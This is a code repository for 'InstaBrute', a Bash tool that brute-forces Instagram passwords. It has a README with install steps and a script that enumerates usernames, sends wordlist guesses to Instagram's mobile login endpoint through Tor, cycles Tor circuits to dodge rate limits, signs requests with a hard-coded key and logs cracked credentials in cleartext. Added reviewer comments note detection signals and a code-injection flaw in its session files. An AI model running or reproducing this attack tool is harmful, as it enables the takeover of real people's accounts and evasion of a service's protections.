├── README.md
├── insta.sh
└── passwords.lst


/README.md:
--------------------------------------------------------------------------------
# InstaBrute
# InstaBrute Two Ways to Brute-force Instagram Account Hacking

### what is a InstaBrute

### Instagram contained two distinct vulnerabilities that allowed an attacker to brute-force
### passwords of user accounts. Combined with user enumeration, a weak password policy
### no 2FA nor other mitigating security controls, this could have allowed an attacker to compromise
### many accounts without any user interaction, including high-profile ones.
### Facebook fixed both issues and awarded a combined bounty of $5.000.


### Download&install

### apt-get install tor

### git clone https://github.com/Ha3MrX/InstaBrute

### cd InstaBrute

### chmod +x insta.sh

### ./insta.sh

### screenshot

![capture](https://user-images.githubusercontent.com/33704360/39670422-5738279c-510d-11e8-9f6d-a8e24114a510.PNG)

### YouTube Channel

### https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA

### Viddeo Tutorial

### https://www.youtube.com/watch?v=a-moMHuZX_Q&t=11s

--------------------------------------------------------------------------------
/insta.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# FB by: https://www.youtube.com/c/HA-MRX
# Instagram: @iemprator_ha_mrx
#
# Reviewer overview (added): this script submits passwords from a wordlist to
# the Instagram mobile login endpoint for one username, routing every request
# through a local Tor SOCKS proxy on port 9050.
# Host artifacts it leaves behind, useful for incident response:
#   sessions/store.session.<user>.<timestamp>  - saved progress (written by store)
#   found.passwords / found.instashell         - cleartext "Username/Password" lines
# Server-side signals are noted next to the login request in bruteforcer().

# Ctrl+C (signal 2, SIGINT) runs store() to offer saving a session, then exits 1.
trap 'store;exit 1' 2

# Client identifiers placed in every login body. All of them are random hex from
# `openssl rand`, regenerated on each run; phone and guid are assembled from the
# same pieces and are therefore the same string.
# Defender note: these fields are attacker-chosen and unstable, so server-side
# throttling has to key on the targeted account rather than on device/guid values.
string4=$(openssl rand -hex 32 | cut -c 1-4)
string8=$(openssl rand -hex 32 | cut -c 1-8)
string12=$(openssl rand -hex 32 | cut -c 1-12)
string16=$(openssl rand -hex 32 | cut -c 1-16)
device="android-$string16"
uuid=$(openssl rand -hex 32 | cut -c 1-32)
phone="$string8-$string4-$string4-$string4-$string12"
guid="$string8-$string4-$string4-$string4-$string12"
# One request to the fetch_headers endpoint at start-up; var2 is carved out of
# that response with awk/cut and is later sent as the "_csrftoken" body field.
var=$(curl -i -s -H "$header" https://i.instagram.com/api/v1/si/fetch_headers/?challenge_type=signup&guid=$uuid > /dev/null)
var2=$(echo $var | awk -F ';' '{print $2}' | cut -d '=' -f3)

# Exit with status 1 unless the effective uid is 0.
# NOTE(review): presumably root is wanted because changeip() signals the tor
# daemon -- the file does not say; confirm.
checkroot() {
  if [[ "$(id -u)" -ne 0 ]]; then
    printf "\e[1;77mPlease, run this program as root!\n\e[0m"
    exit 1
  fi
}

# Verify that every external tool the script calls is on PATH and that
# /dev/urandom exists; print a message to stderr/stdout and exit 1 otherwise.
dependencies() {

  command -v openssl > /dev/null 2>&1 || { echo >&2 "I require openssl but it's not installed. Aborting."; exit 1; }
  command -v tor > /dev/null 2>&1 || { echo >&2 "I require tor but it's not installed. Aborting."; exit 1; }
  command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Aborting."; exit 1; }
  command -v awk > /dev/null 2>&1 || { echo >&2 "I require awk but it's not installed. Aborting."; exit 1; }
  command -v sed > /dev/null 2>&1 || { echo >&2 "I require sed but it's not installed. Aborting."; exit 1; }
  command -v cat > /dev/null 2>&1 || { echo >&2 "I require cat but it's not installed. Aborting."; exit 1; }
  command -v tr > /dev/null 2>&1 || { echo >&2 "I require tr but it's not installed. Aborting."; exit 1; }
  command -v wc > /dev/null 2>&1 || { echo >&2 "I require wc but it's not installed. Aborting."; exit 1; }
  command -v cut > /dev/null 2>&1 || { echo >&2 "I require cut but it's not installed. Aborting."; exit 1; }
  command -v uniq > /dev/null 2>&1 || { echo >&2 "I require uniq but it's not installed. Aborting."; exit 1; }
  if [ $(ls /dev/urandom >/dev/null; echo $?) == "1" ]; then
    echo "/dev/urandom not found!"
    exit 1
  fi

}

# Print the coloured ASCII banner and version line.
banner() {

  printf "\e[1;92m _ \e[0m\n"
  printf "\e[1;92m _ | | https://www.youtube.com/c/HA-MRX \e[0m\n"
  printf "\e[1;92m( \ | | ____ ___ _| |_ _____ \e[0m\n"
  printf "\e[1;92m ) )| || _ \ /___)(_ _)(____ | Ha3MrX \e[0m\n"
  printf "\e[1;77m(_/ | || | | ||___ | | |_ / ___ | _____ \e[0m\n"
  printf "\e[1;77m |_||_| |_|(___/ \__)\_____| (_____) \e[0m\n"
  printf "\n"
  printf "\e[1;77m\e[45m Instagram Brute Forcer v1.5 Author: Ha3MrX (Github/IG) \e[0m\n"
  printf "\n"
}

# Interactive setup: prompts for the target username, the wordlist path
# (default passwords.lst) and the batch size "threads" (default 10).
# Globals written: user, wl_pass, threads.
function start() {
  banner
  checkroot
  dependencies
  read -p $'\e[1;92mUsername account: \e[0m' user
  # Account-existence probe: fetches the public profile URL and counts the
  # "page may have been removed" marker. This is the user-enumeration step the
  # README mentions; on the server side it shows up as an unauthenticated
  # profile lookup that precedes the login attempts.
  checkaccount=$(curl -s https://www.instagram.com/$user/?__a=1 | grep -c "the page may have been removed")
  if [[ "$checkaccount" == 1 ]]; then
    printf "\e[1;91mInvalid Username! Try again\e[0m\n"
    sleep 1
    # Re-prompts by calling itself again.
    start
  else
    default_wl_pass="passwords.lst"
    read -p $'\e[1;92mPassword List (Enter to default list): \e[0m' wl_pass
    wl_pass="${wl_pass:-${default_wl_pass}}"
    default_threads="10"
    read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
    threads="${threads:-${default_threads}}"
  fi
}

# Confirm that a SOCKS5 proxy answers on localhost:9050 by fetching
# check.torproject.org through it; any non-zero curl exit status aborts the run.
checktor() {

  check=$(curl --socks5 localhost:9050 -s https://check.torproject.org > /dev/null; echo $?)

  if [[ "$check" -gt 0 ]]; then
    printf "\e[1;91mPlease, check your TOR Connection! Just type tor or service tor start\n\e[0m"
    exit 1
  fi

}

# SIGINT handler body (see the trap at the top). When "threads" is set it waits
# a few seconds, asks whether to save progress, and on yes writes
# sessions/store.session.<user>.<date> holding user, the current candidate
# password and the wordlist path. Every other path exits with status 1.
function store() {

  if [[ -n "$threads" ]]; then
    printf "\e[1;91m [*] Waiting threads shutting down...\n\e[0m"
    if [[ "$threads" -gt 10 ]]; then
      sleep 6
    else
      sleep 3
    fi
    default_session="Y"
    printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $user
    read -p $'\e[1;77m? [Y/n]: \e[0m' session
    session="${session:-${default_session}}"
    if [[ "$session" == "Y" || "$session" == "y" || "$session" == "yes" || "$session" == "Yes" ]]; then
      if [[ ! -d sessions ]]; then
        mkdir sessions
      fi
      # Security caveat: the values are written between double quotes with no
      # escaping, and resume() later loads this file with `source`. Shell
      # metacharacters inside a wordlist entry or username would therefore be
      # evaluated as code on resume -- treat wordlists and session files from
      # other parties as untrusted input.
      printf "user=\"%s\"\npass=\"%s\"\nwl_pass=\"%s\"\n" $user $pass $wl_pass > sessions/store.session.$user.$(date +"%FT%H%M")
      printf "\e[1;77mSession saved.\e[0m\n"
      # The hint names ./instashell although this listing ships the script as insta.sh.
      printf "\e[1;92mUse ./instashell --resume\n"
    else
      exit 1
    fi
  else
    exit 1
  fi
}


# Send SIGHUP to every process named "tor". Called after each batch and when
# the login endpoint answers "Please wait".
function changeip() {

  killall -HUP tor
  #sleep 3

}

# Main attempt loop for a fresh run. Reads the wordlist in windows of "threads"
# lines (startline..endline), sends one login request per line as a background
# job, then advances the window. The outer loop has no exit condition of its
# own; the run ends through SIGINT (store) or the SIGHUP sent on a hit.
# Globals read: user, wl_pass, threads, phone, guid, device, var2.
function bruteforcer() {

  checktor
  count_pass=$(wc -l $wl_pass | cut -d " " -f1)
  printf "\e[1;92mUsername:\e[0m\e[1;77m %s\e[0m\n" $user
  printf "\e[1;92mWordlist:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass
  printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"

  startline=1
  endline="$threads"
  while [ true ]; do
    IFS=$'\n'
    for pass in $(sed -n ''$startline','$endline'p' $wl_pass); do
      header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

      # JSON login body; login_attempt_count is always the literal "0".
      data='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass'", "login_attempt_count":"0"}'
      # Hard-coded HMAC-SHA256 key used to sign the body (sent with
      # ig_sig_key_version=4). NOTE(review): presumably tied to the app version
      # named in the User-Agent -- the file does not say.
      ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178"

      # Line number(s) of this candidate in the wordlist, for the progress line only.
      countpass=$(grep -n "$pass" "$wl_pass" | cut -d ":" -f1)
      hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
      # Assigned but not read anywhere in this listing; curl below repeats the literal.
      useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

      printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass

      # One background subshell per candidate (SIGINT ignored inside it). The
      # response is reduced to the first of "200", "challenge", "many tries" or
      # "Please wait". "challenge" and "200" are both treated as a correct
      # password: the pair is appended in cleartext to found.passwords and
      # SIGHUP (kill -1) is sent to the main script. "Please wait" triggers
      # changeip. The `done` on this line closes the for-loop; `wait $!` then
      # waits for the last job started in the batch.
      # Defender note: what the service sees is a run of login POSTs for a
      # single username, in parallel batches, arriving via Tor with one constant
      # dated User-Agent and login_attempt_count fixed at "0". Limits keyed on
      # source IP are not sufficient against this pattern; per-account attempt
      # limits, a second factor and rejection of weak passwords (the gaps the
      # README lists) are the controls that bound it.
      {(trap '' SIGINT && var=$(curl --socks5 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "200\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.passwords ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.passwords \n\e[0m"; kill -1 $$ ; elif [[ $var == "200" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.passwords ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.passwords \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!;
    let startline+=$threads
    let endline+=$threads
    changeip
  done
}



# Entry point for `--resume`: lists the saved session files, loads the one the
# operator picks, and continues from the saved password. Hits are written to
# found.instashell here, not found.passwords as in bruteforcer().
# Security caveat: every session file is loaded with `source`, both while
# listing and after selection, so whatever those files contain is executed with
# the privileges of the operator -- which checkroot() elsewhere expects to be root.
function resume() {

  banner
  checktor
  counter=1
  if [[ ! -d sessions ]]; then
    printf "\e[1;91m[*] No sessions\n\e[0m"
    exit 1
  fi
  printf "\e[1;92mFiles sessions:\n\e[0m"
  for list in $(ls sessions/store.session*); do
    IFS=$'\n'
    # Executes the session file to obtain user / pass / wl_pass for display.
    source $list
    printf "\e[1;92m%s \e[0m\e[1;77m: %s (\e[0m\e[1;92mwl:\e[0m\e[1;77m %s\e[0m\e[1;92m,\e[0m\e[1;92m lastpass:\e[0m\e[1;77m %s )\n\e[0m" "$counter" "$list" "$wl_pass" "$pass"
    let counter++
  done
  read -p $'\e[1;92mChoose a session number: \e[0m' fileresume
  # Picks the Nth entry of the same ls output and sources it.
  source $(ls sessions/store.session* | sed ''$fileresume'q;d')
  default_threads="10"
  read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
  threads="${threads:-${default_threads}}"

  printf "\e[1;92m[*] Resuming session for user:\e[0m \e[1;77m%s\e[0m\n" $user
  printf "\e[1;92m[*] Wordlist: \e[0m \e[1;77m%s\e[0m\n" $wl_pass
  printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
  count_pass=$(wc -l $wl_pass | cut -d " " -f1)
  startline="$threads"
  while [ true ]; do
    IFS=$'\n'
    # The saved password is spliced into the sed address as a pattern; the
    # range runs from the first matching wordlist line to line $startline.
    for pass in $(sed -n '/'$pass'/,'$startline'p' $wl_pass); do
      header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

      data='{"phone_id":"$phone", "_csrftoken":"$var2", "username":"'$user'", "guid":"$guid", "device_id":"$device", "password":"'$pass'", "login_attempt_count":"0"}'
      ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178"

      countpass=$(grep -n "$pass" "$wl_pass" | cut -d ":" -f1)
      hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
      useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

      printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass

      # Same request and response classification as in bruteforcer(); only the
      # output file name (found.instashell) differs.
      {(trap '' SIGINT && var=$(curl --socks5 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "200\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "200" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!;
    let startline+=$threads
    changeip
  done
}

# Dispatch: `--resume` continues a saved session; anything else runs the
# interactive setup followed by the attempt loop.
case "$1" in --resume) resume ;; *)
start
bruteforcer
esac

--------------------------------------------------------------------------------